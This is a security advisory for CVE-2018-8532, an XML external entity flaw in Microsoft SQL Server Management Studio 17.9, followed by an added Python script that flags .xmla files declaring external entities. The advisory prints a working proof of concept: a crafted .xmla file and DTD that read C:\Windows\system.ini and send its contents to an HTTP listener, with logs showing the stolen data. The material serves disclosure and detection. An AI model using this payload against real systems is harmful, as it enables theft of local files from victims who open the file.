Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Inject
Source: hyp3rlinx.altervista.org Author: hyp3rlinx Published: 2018-10-12
# Exploit Title: Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection
# Date: 2018-10-10
# Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Vendor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4)
# CVE: CVE-2018-8532
# References:
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1132/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532
 
# Security Issue
# This vulnerability allows remote attackers to disclose sensitive information on
# vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to
# exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
 
# The specific flaw exists within the handling of XMLA files. Due to the improper restriction of
# XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to
# access the URI and embed the contents back into the XML document for further processing. An attacker can leverage
# this vulnerability to disclose information in the context of the current process.
 
# PoC
# 1) python -m SimpleHTTPServer
# 2) "test.xmla"
 
<?xml version="1.0"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
 
# 3) "payload.dtd"
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
 
# Result:
 
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
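
# Added example (not part of the original advisory): a pre-open triage check that flags .xmla files declaring external entities, run here against the test.xmla shown above.
# The names triage_xmla and decode_xml and the block/review/ok policy are assumptions made for illustration.

```python
import re

# External entity declaration: <!ENTITY [%] name SYSTEM "uri"> or PUBLIC "id" "uri".
# XML keywords are case-sensitive, so the match is too.
_EXT_ENTITY = re.compile(
    r"""<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[^\s%"'>]+)\s+
        (?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+
        (?P<q>["'])(?P<uri>.*?)(?P=q)""",
    re.X | re.S,
)
_REMOTE = re.compile(r"^(?:(?:https?|ftp)://|\\\\)", re.I)  # URL or UNC path

# The advisory's test.xmla, embedded as sample input.
SAMPLE_XMLA = rb"""<?xml version="1.0"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""


def decode_xml(raw: bytes) -> str:
    """Decode by BOM so a UTF-16 file cannot slip past a byte-level match."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")


def triage_xmla(raw: bytes) -> dict:
    """Classify a file by text inspection only; nothing is parsed or fetched."""
    text = decode_xml(raw)
    entities = [
        {"name": m["name"], "parameter": m["pe"] is not None,
         "uri": m["uri"], "remote": bool(_REMOTE.match(m["uri"]))}
        for m in _EXT_ENTITY.finditer(text)
    ]
    has_doctype = "<!DOCTYPE" in text
    if entities:
        verdict = "block"    # opening it would read a file or fetch a URI
    elif has_doctype:
        verdict = "review"   # assumption: legitimate XMLA scripts carry no DTD
    else:
        verdict = "ok"
    return {"verdict": verdict, "doctype": has_doctype, "external_entities": entities}


if __name__ == "__main__":
    print(triage_xmla(SAMPLE_XMLA))
```

# The check inspects text only, so it suits mail or file-share filtering in front of unpatched SSMS installs; files in an encoding other than UTF-8 or BOM-marked UTF-16 need decoding first.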
 